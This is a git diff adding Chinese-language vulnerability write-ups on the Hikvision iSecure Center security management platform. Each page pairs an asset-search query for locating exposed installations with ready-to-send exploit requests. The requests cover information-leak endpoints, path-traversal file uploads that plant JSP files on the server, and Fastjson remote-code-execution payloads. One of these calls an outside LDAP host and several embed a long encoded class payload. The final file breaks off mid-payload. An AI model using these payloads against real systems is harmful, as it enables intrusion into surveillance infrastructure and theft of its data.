+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+
+```
+
+![1717150497083-b4bc9797-1270-41b7-87c0-771eb6ad1051.png](./img/4D8_uhrkeXQMXsJC/1717150497083-b4bc9797-1270-41b7-87c0-771eb6ad1051-960575.png)
+
+
+
+> 更新: 2024-06-01 11:04:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qf3ftbtmhnukggpy>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台find信息泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台find信息泄漏漏洞.md
new file mode 100644
index 0000000..2bb94e5
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台find信息泄漏漏洞.md
@@ -0,0 +1,41 @@
+# 海康威视iSecure Center综合安防管理平台find信息泄漏漏洞
+
+# 一、漏洞简介
+HIKVISION 综合安防管理平台存在信息泄漏漏洞，攻击者通过漏洞可以获取环境find等敏感信息进一步攻击。
+
+# 二、影响版本
++ HIKVISION 综合安防管理平台
+
+# 三、<font style="color:rgb(0, 0, 0);">资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/XS4nHgxFeZcZ-7E8/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-166014.png)
+
++ 登录页面
+
+![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/XS4nHgxFeZcZ-7E8/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-968849.png)
+
+# 四、漏洞复现
+```java
+POST /isupm/api/api/..;/..;/person/find HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Length: 95
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Type: application/json;charset=utf-8
+Accept-Encoding: gzip, deflate
+
+{"organizationId":"root000000","pageSize":100,"pageNo":1,"name":"","casecadeSubOrganization":1}
+```
+
+![1711371978631-07879775-bcdf-4673-853d-c0e370b7119d.png](./img/XS4nHgxFeZcZ-7E8/1711371978631-07879775-bcdf-4673-853d-c0e370b7119d-882927.png)
+
+[hikvision-find-info.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1717211077763-07464109-609f-4f5b-bd65-72b7a7d05fe6.yaml)
+
+
+
+> 更新: 2024-06-01 11:04:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vzdf0l0dggn48gti>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台lm任意文件上传漏洞.md b/海康威视iSecureCenter综合安防管理平台lm任意文件上传漏洞.md
new file mode 100644
index 0000000..34f9d16
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台lm任意文件上传漏洞.md
@@ -0,0 +1,49 @@
+# 海康威视iSecure Center综合安防管理平台lm任意文件上传漏洞
+
+# <font style="color:rgb(0, 0, 0);">1、漏洞描述</font>
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞</font>
+
+# <font style="color:rgb(0, 0, 0);">2、影响版本</font>
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台 </font>
+
+![1691858081036-d871cda5-31d1-4693-a77d-41c0bb876b49.png](./img/5ZrA5yjv_Euokk9i/1691858081036-d871cda5-31d1-4693-a77d-41c0bb876b49-238063.png)
+
+# <font style="color:rgb(0, 0, 0);">3、资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+# 4、漏洞复现
+```plain
+POST /lm/api/files;.css HTTP/1.1
+Host: 192.168.110.74
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
+Content-Length: 342
+SL-CE-SUID: 39
+
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M
+Content-Disposition: form-data; name="file"; filename="../../../../../tomcat85linux64.1/webapps/els/static/axaaxs.jsp"
+Content-Type: application/zip
+
+<% out.println("testaxssax");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
+```
+
+![1705912656579-0b74f2f8-cbab-4b04-a900-bb1f98c17b36.png](./img/5ZrA5yjv_Euokk9i/1705912656579-0b74f2f8-cbab-4b04-a900-bb1f98c17b36-353064.png)
+
+上传文件位置
+
+```plain
+/els/static/axaaxs.jsp
+```
+
+![1705912686065-2a7d66ab-a16e-4db2-bfbe-e0625f20dd76.png](./img/5ZrA5yjv_Euokk9i/1705912686065-2a7d66ab-a16e-4db2-bfbe-e0625f20dd76-489678.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hezxivrgwt7xmo53>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台meta信息泄漏漏洞.md b/海康威视iSecureCenter综合安防管理平台meta信息泄漏漏洞.md
new file mode 100644
index 0000000..a2ec778
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台meta信息泄漏漏洞.md
@@ -0,0 +1,30 @@
+# 海康威视iSecure Center综合安防管理平台meta信息泄漏漏洞
+
+# 一、漏洞简介
+HIKVISION 综合安防管理平台meta存在信息泄漏漏洞，攻击者通过漏洞可以获取环境等敏感信息进一步攻击。
+
+# 二、影响版本
++ HIKVISION 综合安防管理平台
+
+# 三、<font style="color:rgb(0, 0, 0);">资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+![1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5.png](./img/UZEDmXJYIKlsRDjT/1691858054561-aa88559b-46e0-4837-ae4c-6f3e9e3982c5-820227.png)
+
++ 登录页面
+
+![1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f.png](./img/UZEDmXJYIKlsRDjT/1691858046745-db2cadc6-9bde-4037-952f-2faf2537b85f-907355.png)
+
+# 四、漏洞复现
+```java
+/center/api/meta
+```
+
+![1717150124074-93684ec4-efd3-4ec9-a16f-3c4795af2dd1.png](./img/UZEDmXJYIKlsRDjT/1717150124074-93684ec4-efd3-4ec9-a16f-3c4795af2dd1-006232.png)
+
+
+
+> 更新: 2024-06-01 11:04:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uv9do2qdiuz3vefk>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台ssoService远程代码执行漏洞.md b/海康威视iSecureCenter综合安防管理平台ssoService远程代码执行漏洞.md
new file mode 100644
index 0000000..10dd2f6
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台ssoService远程代码执行漏洞.md
@@ -0,0 +1,38 @@
+# 海康威视iSecure Center 综合安防管理平台ssoService远程代码执行漏洞
+
+# 1、漏洞描述
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在远程代码执行漏洞</font>
+
+# <font style="color:rgb(0, 0, 0);">2、影响版本</font>
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台 </font>
+
+![1691858087491-a6e46e3a-cb01-43dc-9dfc-382889c5dcae.png](./img/yPdlHXujqASuCoZC/1691858087491-a6e46e3a-cb01-43dc-9dfc-382889c5dcae-608655.png)
+
+# <font style="color:rgb(0, 0, 0);">3、资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+# 4、漏洞复现
+POC：
+
+```java
+POST /bic/ssoService/v1/keepAlive HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Connection: close
+Content-Type: application/json
+Testcmd: whoami
+Content-Length: 5727
+
+{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}
+}
+```
+
+![1688607650157-857fe893-aef4-40b0-916a-a57a0274cba1.png](./img/yPdlHXujqASuCoZC/1688607650157-857fe893-aef4-40b0-916a-a57a0274cba1-202784.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zmt0o54zgh67dtl4>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台svm文件上传漏洞.md b/海康威视iSecureCenter综合安防管理平台svm文件上传漏洞.md
new file mode 100644
index 0000000..0ddc262
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台svm文件上传漏洞.md
@@ -0,0 +1,82 @@
+# 海康威视iSecureCenter综合安防管理平台 svm文件上传漏洞
+
+# 1、漏洞描述
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台svm存在任意文件上传漏洞</font>
+
+# <font style="color:rgb(0, 0, 0);">2、影响版本</font>
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台 </font>
+
+![1691858068026-c05d2dfd-ab38-44cf-a7d4-f5cf0f1be4a1.png](./img/icW1dT4mb2htBLN1/1691858068026-c05d2dfd-ab38-44cf-a7d4-f5cf0f1be4a1-550556.png)
+
+# <font style="color:rgb(0, 0, 0);">3、资产测绘</font>
+**hunter查询语法：**
+
+`app.name=="Hikvision 海康威视 iSecure Center"`
+
+# 4、漏洞复现
+POC：
+
+`https://ip/svm/api/external/report`
+
+判断是否存在该漏洞
+
+![1690550618393-97f7ecb5-730d-446d-9075-803c2d6de1a7.png](./img/icW1dT4mb2htBLN1/1690550618393-97f7ecb5-730d-446d-9075-803c2d6de1a7-438028.png)
+
+## POC1
+```plain
+POST /svm/api/external/report HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_371
+Host: ip
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 172
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="../../../tomcat85linux64.1/webapps/els/static/1ndex.txt"
+
+index
+--00content0boundary00--
+
+```
+
+![1690550672329-2a799722-e942-4433-9a33-a8dd8aa6716a.png](./img/icW1dT4mb2htBLN1/1690550672329-2a799722-e942-4433-9a33-a8dd8aa6716a-742082.png)
+
+上传文件位置
+
+`https://ip/els/static/1ndex.txt`
+
+![1690550733156-055c521c-de3b-4579-a285-4fcc157d9278.png](./img/icW1dT4mb2htBLN1/1690550733156-055c521c-de3b-4579-a285-4fcc157d9278-494680.png)
+
+## POC2
+```plain
+POST /svm/api/external/report HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
+Content-Length: 308
+
+------WebKitFormBoundary9PggsiM755PLa54a
+Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
+Content-Type: application/zip
+
+<%out.print("test");%>
+
+------WebKitFormBoundary9PggsiM755PLa54a--
+
+
+```
+
+![1691860141018-b168e417-ef6c-4350-b31a-145140159598.png](./img/icW1dT4mb2htBLN1/1691860141018-b168e417-ef6c-4350-b31a-145140159598-991196.png)
+
+上传文件位置
+
+```plain
+https://xx.xx.xx.xx/portal/ui/login/..;/..;/new.jsp
+```
+
+![1691860183109-9d6a9f3a-f571-4827-8b63-98f1240bdaa5.png](./img/icW1dT4mb2htBLN1/1691860183109-9d6a9f3a-f571-4827-8b63-98f1240bdaa5-122313.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xogv2fbt69o0h9gq>
\ No newline at end of file
diff --git a/海康威视iSecureCenter综合安防管理平台存在applyCTFastjson命令执行漏洞.md b/海康威视iSecureCenter综合安防管理平台存在applyCTFastjson命令执行漏洞.md
new file mode 100644
index 0000000..a8681da
--- /dev/null
+++ b/海康威视iSecureCenter综合安防管理平台存在applyCTFastjson命令执行漏洞.md
@@ -0,0 +1,77 @@
+# 海康威视iSecure Center 综合安防管理平台存在applyCT Fastjson命令执行漏洞
+
+# 1、漏洞描述
+<font style="color:rgb(0, 0, 0);">  HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞，该漏洞可执行系统命令，可获取到目标服务器系统权限以及敏感数据信息。</font>
+
+# <font style="color:rgb(0, 0, 0);">2、影响版本</font>
+<font style="color:rgb(0, 0, 0);">HIKVISION iSecure Center综合安防管理平台 </font>
+
+![1691858074532-d7e7b422-fc8a-427d-9b7f-894a9c84d5ab.png](./img/3xCBZzWVsmcOpFHe/1691858074532-d7e7b422-fc8a-427d-9b7f-894a9c84d5ab-663441.png)
+
+# <font style="color:rgb(0, 0, 0);">3、资产测绘</font>
+**hunter查询语法：**
+
+`<font style="color:rgb(0, 0, 0);">app.name=="Hikvision 海康威视 iSecure Center"</font>`
+
+# <font style="color:rgb(0, 0, 0);">4、漏洞复现</font>
+poc：
+
+```plain
+POST /bic/ssoService/v1/applyCT HTTP/1.1
+Host: *
+User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+Content-Length: 5727
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Connection: close
+Content-Type: application/json
+
+{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://mmmm.dns.cn","autoCommit":true},"hfe4zyyzldp":"="}
+```
+
+![1690419004626-3f5d2594-92fb-4d51-86de-d33904a00e90.png](./img/3xCBZzWVsmcOpFHe/1690419004626-3f5d2594-92fb-4d51-86de-d33904a00e90-440368.png)
+
+exp：
+
+出网情况下可利用JNDIExploit
+
+```plain
+POST /bic/ssoService/v1/applyCT HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
+Accept: text/css,*/*;q=0.1
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type:application/json
+cmd:whoami
+Content-Length: 215
+
+{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
+```
+
+![1690419116802-6e162ab9-8b94-4f6c-806f-2097f8e233e4.png](./img/3xCBZzWVsmcOpFHe/1690419116802-6e162ab9-8b94-4f6c-806f-2097f8e233e4-541729.png)
+
+不出网状况下通过org.apache.tomcat.dbcp.dbcp2.BasicDataSource
+
+```plain
+POST /bic/ssoService/v1/applyCT HTTP/1.1
+Host: *
+User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+Content-Length: 5727
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Connection: close
+Content-Type: application/json
+Referer: *
+Testcmd: whoami
+
+{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c